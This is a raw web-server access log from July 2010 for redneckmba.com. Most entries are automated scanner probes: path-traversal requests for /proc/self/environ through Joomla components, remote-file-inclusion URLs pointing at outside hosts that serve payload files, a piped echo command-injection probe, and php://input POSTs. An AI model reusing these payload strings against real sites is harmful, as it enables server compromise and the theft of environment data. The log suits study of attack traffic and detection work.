64.34.172.171 - - [26/Jul/2010:22:13:52 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:13:53 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:13:53 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:14:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:15:54 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:15:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:15:55 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
69.175.118.101 - - [26/Jul/2010:22:17:28 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.redneckmba.com"
69.175.118.101 - - [26/Jul/2010:22:17:28 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.redneckmba.com"
69.175.118.101 - - [26/Jul/2010:22:17:28 -0700] "GET /logs/access.log/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:22:18:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:19:00 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:19:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:19:00 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:20:46 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:20:47 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:20:47 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:22:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
69.175.118.101 - - [26/Jul/2010:22:32:03 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.redneckmba.com"
69.175.118.101 - - [26/Jul/2010:22:32:03 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.redneckmba.com"
69.175.118.101 - - [26/Jul/2010:22:32:03 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.redneckmba.com"
76.13.114.107 - - [26/Jul/2010:22:34:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.227.214.212 - - [26/Jul/2010:22:36:41 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.123.194 - - [26/Jul/2010:22:37:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [26/Jul/2010:22:40:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:45:21 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:45:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:45:21 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:22:45:47 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:22:45:47 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:22:45:47 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
83.16.100.218 - - [26/Jul/2010:22:47:12 -0700] "GET /logs///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.16.100.218 - - [26/Jul/2010:22:47:12 -0700] "GET /logs/access.log///administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
83.16.100.218 - - [26/Jul/2010:22:47:12 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:49:02 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:49:02 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:49:02 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:22:49:38 -0700] "GET /logs/access_100614.log//includes/tgpinc.php?DOCUMENT_ROOT=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:22:58:03 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:22:58:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:22:58:04 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:23:00:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.34.172.171 - - [26/Jul/2010:23:02:19 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:23:02:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:23:02:19 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
193.47.80.50 - - [26/Jul/2010:23:07:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.redneckmba.com"
193.47.80.50 - - [26/Jul/2010:23:06:52 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.redneckmba.com"
72.55.153.180 - - [26/Jul/2010:23:09:44 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.darbro.co.uk//e107_page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
72.55.153.180 - - [26/Jul/2010:23:09:44 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.darbro.co.uk//e107_page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
72.55.153.180 - - [26/Jul/2010:23:09:45 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.darbro.co.uk//e107_page/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
72.55.153.180 - - [26/Jul/2010:23:09:45 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
72.55.153.180 - - [26/Jul/2010:23:09:45 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
72.55.153.180 - - [26/Jul/2010:23:09:45 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:23:16:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:23:27:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [26/Jul/2010:23:31:47 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
88.250.57.232 - - [26/Jul/2010:23:42:49 -0700] "GET /logs/access_100726.log HTTP/1.0" 200 718663 "-" "Wget/1.11.4" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:49:44 -0700] "GET /logs/index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:49:46 -0700] "GET /index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:49:53 -0700] "GET /logs/index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:49:53 -0700] "GET /index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:50:28 -0700] "GET /logs/index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:50:28 -0700] "GET /index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:50:43 -0700] "GET /logs/index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:50:44 -0700] "GET /index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:51:25 -0700] "GET /index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:51:26 -0700] "GET /index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:51:27 -0700] "GET /index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:51:29 -0700] "GET /index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:52:59 -0700] "GET /index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:52:59 -0700] "GET /index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:52:59 -0700] "GET /index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [26/Jul/2010:23:52:59 -0700] "GET /index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:23:53:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:23:55:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
112.105.130.91 - - [26/Jul/2010:23:55:19 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:27 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:28 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:31 -0700] "GET /logs/*?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:36 -0700] "GET /*?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:44 -0700] "GET /logs/*.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:44 -0700] "GET /*.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:53 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:58:53 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:59:00 -0700] "GET /logs/?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.61 - - [26/Jul/2010:23:59:00 -0700] "GET /?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:06:59 -0700] "GET /logs/access.log/index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:07:00 -0700] "GET /index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:07:00 -0700] "GET /logs/access.log/index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:07:01 -0700] "GET /logs/index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:07:01 -0700] "GET /index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:07:02 -0700] "GET /logs/index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:08:31 -0700] "GET /logs/access.log/index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:08:31 -0700] "GET /logs/access.log/index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:08:31 -0700] "GET /index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:08:31 -0700] "GET /logs/index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:08:32 -0700] "GET /index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:08:32 -0700] "GET /logs/index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
67.217.170.8 - - [27/Jul/2010:00:09:26 -0700] "GET /logs/access.log/myMailer.class.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
67.217.170.8 - - [27/Jul/2010:00:09:26 -0700] "GET /myMailer.class.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
67.217.170.8 - - [27/Jul/2010:00:09:26 -0700] "GET /logs/myMailer.class.php?mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:06 -0700] "GET /logs////download.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:06 -0700] "GET /logs////download.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:21 -0700] "GET /logs////download.php?board_skin_path=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:21 -0700] "POST /logs////download.php?board_skin_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:21 -0700] "GET ///download.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:21 -0700] "GET ///download.php?board_skin_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:22 -0700] "GET ///download.php?board_skin_path=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
85.17.199.46 - - [27/Jul/2010:00:19:22 -0700] "POST ///download.php?board_skin_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.redneckmba.com"
76.13.114.105 - - [27/Jul/2010:00:23:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [27/Jul/2010:00:27:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [27/Jul/2010:00:30:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:47:09 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:47:09 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:47:09 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [27/Jul/2010:00:52:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:55:39 -0700] "GET /logs/access_100614.log/index.php?option=com_joomla-visites&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:55:39 -0700] "GET /logs/access_100614.log/index.php?option=com_joomla-visites&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:56:13 -0700] "GET /logs/access_100614.log/index.php?option=com_joomla-visites&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
64.34.178.107 - - [27/Jul/2010:00:57:22 -0700] "GET /logs/access_100614.log/index.php?option=com_joomla-visites&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:57:33 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.244.87.243 - - [27/Jul/2010:00:57:33 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.195.115.240 - - [27/Jul/2010:00:58:21 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
67.195.115.240 - - [27/Jul/2010:00:58:21 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
